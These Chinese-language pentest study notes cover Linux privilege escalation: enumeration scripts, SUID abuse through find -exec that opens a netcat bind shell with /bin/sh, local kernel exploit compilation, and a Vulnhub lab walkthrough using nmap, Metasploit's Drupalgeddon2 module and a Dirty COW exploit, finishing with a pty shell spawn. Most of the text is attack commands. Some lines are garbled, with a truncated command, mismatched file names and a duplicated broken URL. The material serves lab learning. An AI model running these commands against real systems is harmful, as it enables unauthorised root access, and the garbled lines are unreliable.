linux提权一般放置tmp目录,临时目录,一般可读写,可执行.sh是linux可执行文件
运行:./linux.x.x.x.x.sh
perl对应的是 pl
有本地用户,就本地提权,没有就通过MSF提权
#案例1.Linux提权自动化脚本利用-4个脚本
两个信息收集:LinEnum,linuxprivchecker
为后续的提权方法提供基础,
两个漏洞探针:linux-exploit-suggester linux-exploit-suggester2
#案例2.LInux提权SUID配合脚本演示-Web
漏洞成因:chmod u+s 给予了 suid u-s删除了suid
使程序在运行过程中受到lsuid root权限的执行过程导致
(普通用户执行,实际是以root权限执行)
提权过程:探针是否有SUID(手工或脚本)-特定SUID利用-利用吃瓜-GG
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
参考利用:https://pentestlab.blog/2017/09/25/suid-executables/
touch xiaodi
find xiaodi -exec whoami ;
ind xiaodi -exec netcat -lvp 5555 -e /bin/sh ;
netcat xx.xx.xx.xx 5555
0x01.得到webshell权限
gcc 45010.c -o 45010
chmod +x 45010
./45010
id
#案例4.LInux提权脏牛内核漏洞演示-Vulnhub
内核提权整个过程:(linux-exploit-suggester 获取信息哦)
vulnhub 靶机-探针目标-CMS 漏洞利用-脚本探针提权漏洞-利用内核提权-GG 内核漏洞
提权过程:寻可用-下 exp-上/tmp-编译 exp-执行(无权限用 chmod)
nmap 192.168.76.0/24
nmap -p1-65535 192.168.76.141
search drupal
use exploit/unix/webapp/drupal_drupalgeddon2
set lhost 192.168.76.141
set lport 1898
set target 0
run
upload /tmp/40837.cpp /tmp/40837.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
python -c 'import pty; pty.spawn("/bin/bash")' #利用python生成可交互式shell
./dcow
脏牛漏洞:
https://paper.seebug.org/483/#_4
ps://paper.seebug.org/483/#_4)